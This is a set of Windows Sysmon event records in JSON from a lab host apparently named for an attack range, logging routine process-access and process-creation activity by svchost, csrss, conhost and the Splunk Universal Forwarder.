{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4169,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.326\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.326","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4170,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.326\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.326","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4171,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.326\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.326","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4172,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.326\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2077-5F25-0000-0010542F0600}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.326","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2077-5F25-0000-0010542F0600}","TargetProcessId":"3296","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:43","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4173,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.466\r\nSourceProcessGUID: {41C8662E-2077-5F25-0000-0010542F0600}\r\nSourceProcessId: 3296\r\nSourceThreadId: 3268\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.466","SourceProcessGUID":"{41C8662E-2077-5F25-0000-0010542F0600}","SourceProcessId":"3296","SourceThreadId":"3268","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4174,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.998\r\nProcessGuid: {41C8662E-2077-5F25-0000-00100E310600}\r\nProcessId: 2252\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.998","ProcessGuid":"{41C8662E-2077-5F25-0000-00100E310600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4175,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.998\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2077-5F25-0000-00100E310600}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.998","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2077-5F25-0000-00100E310600}","TargetProcessId":"2252","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4176,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.998\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2077-5F25-0000-00100E310600}\r\nTargetProcessId: 2252\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.998","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2077-5F25-0000-00100E310600}","TargetProcessId":"2252","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:44","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4177,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:43.998\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:43.998","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
